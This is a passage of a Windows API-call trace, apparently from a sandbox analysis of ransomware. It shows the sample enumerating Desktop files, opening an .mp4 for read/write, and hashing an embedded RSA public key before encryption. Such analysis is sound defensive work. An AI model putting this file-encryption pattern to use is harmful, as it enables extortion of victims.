HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.978] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\") returned="rQja5oZ7_uz\\" [0202.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0202.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0202.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.979] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\") returned="UovhOsbqK0eMsW0c\\" [0202.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0202.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0202.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0202.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91840 | out: hHeap=0x620000) returned 1 [0202.979] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\") returned="sj76aMesI3jmtOuE2hz\\" [0202.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d50 [0202.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0202.980] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0202.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1d50 | out: hHeap=0x620000) returned 1 [0202.980] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0202.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0202.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.980] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0202.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0202.981] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0202.981] PathFindFileNameW (pszPath="") returned="" [0202.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.981] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rqja5oz7_uz\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b6e8320, ftCreationTime.dwHighDateTime=0x1d89ebd, ftLastAccessTime.dwLowDateTime=0x905b3810, ftLastAccessTime.dwHighDateTime=0x1d89fd4, ftLastWriteTime.dwLowDateTime=0x905b3810, ftLastWriteTime.dwHighDateTime=0x1d89fd4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0202.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.982] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b6e8320, ftCreationTime.dwHighDateTime=0x1d89ebd, ftLastAccessTime.dwLowDateTime=0x905b3810, ftLastAccessTime.dwHighDateTime=0x1d89fd4, ftLastWriteTime.dwLowDateTime=0x905b3810, ftLastWriteTime.dwHighDateTime=0x1d89fd4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0202.982] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4fa40a0, ftCreationTime.dwHighDateTime=0x1d89934, ftLastAccessTime.dwLowDateTime=0xfee9be30, ftLastAccessTime.dwHighDateTime=0x1d8a38c, ftLastWriteTime.dwLowDateTime=0xfee9be30, ftLastWriteTime.dwHighDateTime=0x1d8a38c, nFileSizeHigh=0x0, nFileSizeLow=0xc08e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EhqiUu8LglRl.mp4", cAlternateFileName="EHQIUU~1.MP4")) returned 1 [0202.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0202.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0202.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0202.983] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\EhqiUu8LglRl.mp4") returned=".mp4" [0202.983] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\EhqiUu8LglRl.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rqja5oz7_uz\\ehqiuu8lglrl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0202.983] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=49294) returned 1 [0202.983] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0202.986] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xc068, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0202.986] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0202.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.988] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.988] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xc08e, lpOverlapped=0x0) returned 1 [0202.989] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0202.990] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.990] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0202.990] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0202.991] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0202.991] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0202.991] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0202.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0202.991] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0202.991] GetLastError () returned 0x0 [0202.991] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0202.991] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0202.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0202.992] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0202.992] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0202.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0202.992] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0202.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0202.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0202.992] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc090) returned 0x2ea99b0 [0202.992] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0202.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d50 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36c8 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d98 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0202.993] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0202.994] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0202.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0202.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0202.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0202.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3728 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3710 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 